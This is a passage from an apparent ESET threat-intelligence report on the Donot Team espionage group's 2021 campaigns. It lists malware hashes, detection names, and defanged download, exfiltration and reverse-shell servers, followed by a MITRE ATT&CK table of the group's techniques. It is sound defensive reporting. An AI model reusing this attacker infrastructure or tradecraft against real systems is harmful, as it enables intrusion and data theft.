  • soundvista[.]club/sessionrequest
  • soundvista[.]club/orderme/
  • soundvista[.]club/winuser

Exfiltration server

  • request.resolverequest[.]live/upload/

Reverse shell server

DarkMusical – September 2021

Samples

SHA-1 Filename ESET detection name
1917316C854AF9DA9EBDBD4ED4CBADF4FDCFA4CE rihana.exe Win32/TrojanDownloader.Donot.G
6643ACD5B07444D1B2C049BDE61DD66BEB0BD247 acrobat.dll Win32/TrojanDownloader.Donot.F
9185DEFC6F024285092B563EFA69EA410BD6F85B remember.exe Win32/TrojanDownloader.Donot.H
954CFEC261FEF2225ACEA6D47949D87EFF9BAB14 forbidden.exe Win32/TrojanDownloader.Donot.I
7E9A4A13A76CCDEC880618BFF80C397790F3CFF3 serviceup.exe Win32/ReverseShell.J
BF183A1EC4D88034D2AC825278FB084B4CB21EAD srcot.exe Win32/Spy.Donot.F
1FAA4A52AA84EDB6082DEA66F89C05E0F8374C4C upsvcsu.exe WinGo/Spy.Donot.A
2F2EA73B5EAF9F47DCFB7BF454A27A3FBF253A1E sdudate.exe Win32/ReverseShell.J
39F92CBEC05785BF9FF28B7F33906C702F142B90 ndexid.exe Win32/Spy.Donot.C
1352A8394CCCE7491072AAAC9D19ED584E607757 ndexid.exe Win32/Spy.Donot.E
623767BC142814AB28F8EC6590DC031E7965B9CD ndexid.exe Win32/Spy.Donot.A

Network

Download servers

  • digitalresolve[.]live/~~/ekcvilsrkjiasfjkikiakik
  • digitalresolve[.]live/~~/ziuriucjiekuiemoaeukjudjkgfkkj
  • digitalresolve[.]live/~~/Sqieilcioelikalik
  • printersolutions[.]live/~~/orderme

Exfiltration server

  • packetbite[.]live/~~/uload

Reverse shell servers

  • 37.120.198[.]208
  • 51.38.85[.]227

DarkMusical – June 2021

Samples

SHA-1 Filename ESET detection name
BB0C857908AFC878CAEEC3A0DA2CBB0A4FD4EF04 ertficial.dll Win32/TrojanDownloader.Donot.X
6194E0ECA5D494980DF5B9AB5CEA8379665ED46A ertficial.dll Win32/TrojanDownloader.Donot.X
ACB4DF8708D21A6E269D5E7EE5AFB5168D7E4C70 msofficedll.dll Win32/TrojanDownloader.Donot.L
B38F3515E9B5C8F4FB78AD17C42012E379B9E99A sccmo.exe Win32/TrojanDownloader.Donot.M
60B2ADE3B339DE4ECA9EC3AC1A04BDEFC127B358 pscmo.exe Win32/TrojanDownloader.Donot.I

Network

Download servers

  • biteupdates[.]live/~~/orderme
  • biteupdates[.]live/~~/KdkdUe7KmmGFD
  • biteupdates[.]live/~~/acdfsgbvdghd
  • dataupdates[.]live/~~/DKixeXs44skdqqD
  • dataupdates[.]live/~~/BcX21DKixeXs44skdqqD

Henos – February/March 2021

Samples

SHA-1 Filename ESET detection name
468A04B358B780C9CC3174E107A8D898DDE4B6DE Procurement Letter Feb 21.doc Win32/Exploit.CVE-2017-11882.CP
9DD042FC83119A02AAB881EDB62C5EA3947BE63E ctlm.dll Win32/Spy.Donot.N
25825268868366A31FA73095B0C5D0B696CD45A2 stpnaqs.pmt (jptvbh.exe) Win32/TrojanDownloader.Donot.Z
540E7338725CBAA2F33966D5C1AE2C34552D4988 henos.dll Win32/Spy.Donot.G
526E5C25140F7A70BA9F643ADA55AE24939D10AE plaapas.exe WinGo/Spy.Donot.B
89ED760D544CEFC6082A3649E8079EC87425FE66 javatemp.exe Win32/Spy.Donot.G
9CA5512906D43EB9E5D6319E3C3617182BBF5907 pytemp.exe WinGo/Spy.Donot.A

Network

Download servers

  • info.printerupdates[.]online//Xddv21SDsxDl
  • info.printerupdates[.]online/~/XddvInXdl
  • info.printerupdates[.]online/~/ZuDDey1eDXUl
  • info.printerupdates[.]online/~/Vyuib45xzlqn

Exfiltration server

  • https://manage.biteupdates[.]site//uload

MITRE ATT&CK techniques

This table was built using version 10 of the ATT&CK framework.

Tactic | ID | Name | Description
Resource Development | T1588.005 | Obtain Capabilities: Exploits | Donot Team has used CVE-2017-11882 exploits to run its first-stage malware.
Initial Access | T1566.001 | Phishing: Spearphishing Attachment | Donot Team has sent spearphishing emails to its victims with malicious Word or PowerPoint attachments.
Execution | T1204.002 | User Execution: Malicious File | Donot Team has lured its victims into opening malicious email attachments.
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic | Donot Team has used macros contained in PowerPoint documents.
Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Donot Team has used reverse shells on the system to execute commands.
Execution | T1203 | Exploitation for Client Execution | Donot Team has used CVE-2017-11882 exploits to execute code on the victim's machine.
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Donot Team has created scheduled tasks for persistence of its malicious components.
Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Donot Team has used filenames such as pytemp or javatemp to approximate the name of legitimate software.
Discovery | T1057 | Process Discovery | Donot Team has implemented checks for older versions of the malware running on the victim's system.
Lateral Movement | T1534 | Internal Spearphishing | Donot Team has sent spearphishing emails to its victims that came from within the same targeted organization.
Collection | T1005 | Data from Local System | Donot Team has used malicious modules that traverse the victim's filesystem looking for files with various extensions.
Collection | T1025 | Data from Removable Media | Donot Team has used a malicious module to copy files from removable drives.
Collection | T1074.001 | Data Staged: Local Data Staging | Donot Team has staged files for exfiltration in a single location, a folder on the victim's computer.
Collection | T1113 | Screen Capture | Donot Team has used malicious modules to take screenshots from victims.
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | Donot Team has used HTTP/S for C&C communications and data exfiltration.
Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Donot Team has used dedicated servers for exfiltration, sending the files over HTTP or HTTPS, unencrypted.



https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
